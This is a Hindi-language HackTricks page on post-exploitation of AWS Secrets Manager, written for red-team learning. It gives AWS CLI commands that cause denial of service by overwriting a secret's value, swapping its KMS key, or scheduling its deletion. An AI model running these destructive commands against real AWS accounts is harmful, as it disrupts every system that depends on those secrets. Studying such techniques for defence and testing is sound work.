AWS - Secrets Manager Post Exploitation

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud github repos में PRs सबमिट करें।

Secrets Manager

अधिक जानकारी के लिए देखें:

AWS - Secrets Manager Enum

Secrets पढ़ें

सीक्रेट्स स्वयं संवेदनशील जानकारी हैं, प्रिवेस्क पृष्ठ देखें यह जानने के लिए कि उन्हें कैसे पढ़ें।

DoS सीक्रेट वैल्यू बदलें

सीक्रेट का मान बदलने से आप उस मान पर निर्भर सभी सिस्टम को DoS कर सकते हैं।

ध्यान दें कि पिछले मान भी संग्रहीत होते हैं, इसलिए पिछले मान पर वापस जाना आसान है।

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS KMS कुंजी बदलें

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Secret हटाना

गुप्त को हटाने के लिए न्यूनतम दिनों की संख्या 7 है

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud github रिपोजिटरी में PRs सबमिट करें।

PreviousAWS - S3 Post Exploitation NextAWS - SES Post Exploitation

Last updated 1 month ago